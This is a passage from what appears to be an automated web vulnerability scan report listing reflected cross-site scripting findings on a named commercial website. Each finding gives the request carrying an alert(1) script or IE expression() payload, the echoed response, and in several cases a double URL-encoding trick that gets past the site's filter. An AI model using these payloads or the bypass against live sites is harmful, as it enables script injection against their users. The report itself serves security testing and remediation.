Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=pvqz3e55knqwjb55fkolzlq3; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11110
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/product/reviews/index.htm?dadb8"><script>alert(1)</script>9e1a39efb8f=1" rel="nofollow" target="_blank">
...[SNIP]...

3.159. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2401f"><script>alert(1)</script>0614465aa10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?2401f"><script>alert(1)</script>0614465aa10=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:20 GMT
Content-Length: 11110
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4os3yc45lngvyibnt1hyfy45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/product/reviews/index.htm?2401f"><script>alert(1)</script>0614465aa10=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.160. http://www.smartdraw.com/product/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1 was submitted in the REST URL parameter 1. This input was echoed as c202c"style="x:expression(alert(1))"1983cde1eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /productc202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:44 GMT
Content-Length: 8760
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yytjsqjo2ynqqa55mlvyit45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/productc202c"style="x:expression(alert(1))"1983cde1eb1/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.161. http://www.smartdraw.com/product/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0 was submitted in the REST URL parameter 1. This input was echoed as a6214"style="x:expression(alert(1))"a8713ae88e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=g5orivnknoeu3mnalqm5ky2h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/a6214"style="x:expression(alert(1))"a8713ae88e0/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.162. http://www.smartdraw.com/product/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a was submitted in the REST URL parameter 2. This input was echoed as 9a64e"style="x:expression(alert(1))"79d9addfb9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4ccossevexhpky454jv13azr; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/9a64e"style="x:expression(alert(1))"79d9addfb9a/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.163. http://www.smartdraw.com/product/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e was submitted in the REST URL parameter 2. This input was echoed as e7026"style="x:expression(alert(1))"d34dba31b1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/x22e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:53 GMT
Content-Length: 8760
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5ppvdnq4c02bbb55spc4py55; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22e7026"style="x:expression(alert(1))"d34dba31b1e/" rel="nofollow" target="_blank">
...[SNIP]...

3.164. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 146c3"style="x:expression(alert(1))"5d5d2fc8c51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/x22?146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=uaszcl55vdwks2faid1tcq45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22/?146c3"style="x:expression(alert(1))"5d5d2fc8c51=1" rel="nofollow" target="_blank">
...[SNIP]...

3.165. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbd65"style="x:expression(alert(1))"a43b560b887 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/x22?fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k3dxer55b03zcg45gc2kh5b5; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22/?fbd65"style="x:expression(alert(1))"a43b560b887=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.166. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1 was submitted in the REST URL parameter 2. This input was echoed as 80d8a"style="x:expression(alert(1))"b9c460ef3f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8774
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gvwmqnneobzhy02artx2kqbp; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/80d8a"style="x:expression(alert(1))"b9c460ef3f1/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.167. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f was submitted in the REST URL parameter 2. This input was echoed as a1cdd"style="x:expression(alert(1))"48d79440d3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b00pwu55pf2clt55u0k5o0rq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/a1cdd"style="x:expression(alert(1))"48d79440d3f/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.168. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d74b"><script>alert(1)</script>7dda0913f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/diagram.asp/x22?8d74b"><script>alert(1)</script>7dda0913f6b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 03 Feb 2011 20:29:21 GMT
Content-Length: 12908
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=dia; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=wpmm4p551c2dea45k15ywp45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=99C7B3EB-F63C-4257-8835-C875E636C1F0; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: SDLINKID=9184; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/diagram.asp/x22/?8d74b"><script>alert(1)</script>7dda0913f6b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.169. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f932a"><script>alert(1)</script>9f207111f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/diagram.asp/x22?f932a"><script>alert(1)</script>9f207111f3=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=dia; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4dwhidrvpjbkw1msj4gobert; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=6103C386-4733-4A43-95B7-51E67A55D6CD; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: SDLINKID=9184; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12901
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/diagram.asp/x22/?f932a"><script>alert(1)</script>9f207111f3=1" rel="nofollow" target="_blank">
...[SNIP]...

3.170. http://www.smartdraw.com/specials/floorplans.asp/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/floorplans.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32 was submitted in the REST URL parameter 2. This input was echoed as fb652"style="x:expression(alert(1))"3dd903a5e32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
